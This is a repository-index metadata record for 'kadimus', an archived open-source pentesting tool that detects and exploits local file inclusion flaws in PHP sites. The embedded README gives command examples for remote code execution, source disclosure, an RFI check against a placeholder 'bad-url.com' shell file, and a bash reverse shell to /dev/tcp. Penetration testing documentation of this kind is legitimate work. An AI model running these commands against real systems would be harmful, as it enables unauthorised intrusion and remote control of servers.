{"id":13362471,"url":"https://github.com/P0cL4bs/kadimus","last_synced_at":"2025-03-12T15:30:56.118Z","repository":{"id":34254289,"uuid":"38138575","full_name":"P0cL4bs/kadimus","owner":"P0cL4bs","description":"kadimus is a tool to check and exploit lfi vulnerability.","archived":true,"fork":false,"pushed_at":"2020-08-17T12:01:23.000Z","size":245,"stargazers_count":513,"open_issues_count":7,"forks_count":129,"subscribers_count":31,"default_branch":"master","last_synced_at":"2024-11-03T04:32:20.747Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/P0cL4bs.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"license.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2015-06-26T23:20:53.000Z","updated_at":"2024-11-01T18:37:19.000Z","dependencies_parsed_at":"2022-08-20T11:50:22.378Z","dependency_job_id":null,"html_url":"https://github.com/P0cL4bs/kadimus","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/P0cL4bs%2Fkadimus","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/P0cL4bs%2Fkadimus/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/P0cL4bs%2Fkadimus/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/P0cL4bs%2Fkadimus/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/P0cL4bs","download_url":"https://codeload.github.com/P0cL4bs/kadimus/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243242705,"owners_coun
t":20259805,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-29T23:00:48.856Z","updated_at":"2025-03-12T15:30:55.762Z","avatar_url":"https://github.com/P0cL4bs.png","language":"C","funding_links":["https://www.paypal.com/cgi-bin/webscr?cmd=_donations\u0026business=RAG26EKAYHQSY\u0026currency_code=BRL\u0026source=url"],"categories":["Pentesting","📦 Legacy \u0026 Inactive Projects"],"sub_categories":["Payloads"],"readme":" [![Rawsec's CyberSecurity Inventory](https://inventory.rawsec.ml/img/badges/Rawsec-inventoried-FF5050_flat.svg)](https://inventory.rawsec.ml/tools.html#Kadimus)\n [![GitHub stars](https://img.shields.io/github/stars/P0cL4bs/Kadimus.svg)](https://github.com/P0cL4bs/Kadimus/stargazers)\n [![GitHub license](https://img.shields.io/github/license/P0cL4bs/Kadimus.svg)](https://github.com/P0cL4bs/Kadimus/blob/master/license.txt)\n\n# kadimus\nLFI Scan \u0026amp; Exploit Tool\n--\nkadimus is a tool to check for and exploit LFI vulnerabilities, with a focus on PHP systems.\n\nFeatures:\n\n- [x] Check all URL parameters\n- [x] /var/log/auth.log RCE\n- [x] /proc/self/environ RCE\n- [x] php://input RCE\n- [x] data://text RCE\n- [x] expect://cmd RCE\n- [x] Source code disclosure\n- [x] Command shell interface through HTTP request\n- [x] Proxy support (socks4://, socks4a://, socks5://, socks5h:// and http://)\n- [x] Proxy socks5 support for remote connections\n\n## Compile:\n\nFirst, make sure you have all dependencies installed on your system: `libcurl`, `libopenssl`, `libpcre` and `libssh`.\n\nThen you can clone the repository to get the source 
code:\n```sh\n$ git clone https://github.com/P0cL4bs/kadimus.git\n$ cd kadimus\n```\n\n### And finally:\n\n```sh\n$ make\n```\n\n## Options:\n\n```\nOptions:\n  -h, --help                    Display this help menu\n\n  Request:\n    -B, --cookie STRING         Set custom HTTP cookie header\n    -A, --user-agent STRING     User-Agent to send to server\n    --connect-timeout SECONDS   Maximum time allowed for connection\n    --retry NUMBER              Number of times to retry if connection fails\n    --proxy STRING              Proxy to connect (syntax: protocol://hostname:port)\n\n  Scanner:\n    -u, --url STRING            URL to scan/exploit\n    -o, --output FILE           File to save output results\n\n  Explotation:\n    --parameter STRING          Parameter name to inject exploit\n                                (only needed by RCE data and source disclosure)\n\n  RCE:\n    -T, --technique=TECH        LFI to RCE technique to use\n    -C, --code STRING           Custom PHP code to execute, with php brackets\n    -c, --cmd STRING            Execute system command on vulnerable target system\n    -s, --shell                 Simple command shell interface through HTTP request\n\n    --connect STRING            IP/hostname to connect to\n    -p, --port NUMBER           Port number to connect to or listen on\n    -l, --listen                Bind and listen for incoming connections\n\n    --ssh-port NUMBER           Set the SSH port to try command injection (default: 22)\n    --ssh-target STRING         Set the SSH host\n\n    RCE Available techniques\n\n      environ                   Try to run PHP code using /proc/self/environ\n      input                     Try to run PHP code using php://input\n      auth                      Try to run PHP code using /var/log/auth.log\n      data                      Try to run PHP code using data://text\n      expect                    Try to run a command using expect://cmd\n\n    Source Disclosure:\n      -S, --source      
        Try to get the source file using filter://\n      -f, --filename STRING     Set filename to grab source [REQUIRED]\n      -O FILE                   Set output file (default: stdout)\n\n```\n\n## Examples:\n\n### Scanning:\n```\n./kadimus -u localhost/?pg=contact -A my_user_agent\n```\n\n### Get source code of file:\n```\n./kadimus -u localhost/?pg=contact -S -f \"index.php%00\" -O local_output.php --parameter pg\n```\n\n### Execute php code:\n```\n./kadimus -u localhost/?pg=php://input%00 -C '\u003c?php echo \"pwned\"; ?\u003e' -T input\n```\n\n### Execute command:\n```\n./kadimus -u localhost/?pg=/var/log/auth.log -T auth -c 'ls -lah' --ssh-target localhost\n```\n\n### Checking for RFI:\n\nYou can also check for RFI errors: put the remote URL in resource/common_files.txt\nalong with the regex to identify them. Example:\n\n```php\n/* http://bad-url.com/shell.txt */\n\u003c?php echo base64_decode(\"c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU=\"); ?\u003e\n```\n\nIn the file:\n```\nhttp://bad-url.com/shell.txt?:scorpion say get over here\n```\n\n### Reverse shell:\n```\n./kadimus -u localhost/?pg=contact.php -T data --parameter pg -lp 12345 -c '/bin/bash -c \"bash -i \u003e\u0026 /dev/tcp/172.17.0.1/1234 0\u003e\u00261\"' --retry 0\n```\n\nContributing\n------------\nYou can help with code, or by donating.\nIf you want to help with code, use the kernel code style as a reference.\n\nPaypal: [![](https://www.paypalobjects.com/en_US/i/btn/btn_donate_SM.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_donations\u0026business=RAG26EKAYHQSY\u0026currency_code=BRL\u0026source=url)\n\nBTC: 1PpbrY6j1HNPF7fS2LhG9SF2wtyK98GSwq\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FP0cL4bs%2Fkadimus","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FP0cL4bs%2Fkadimus","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FP0cL4bs%2Fkadimus/lists"}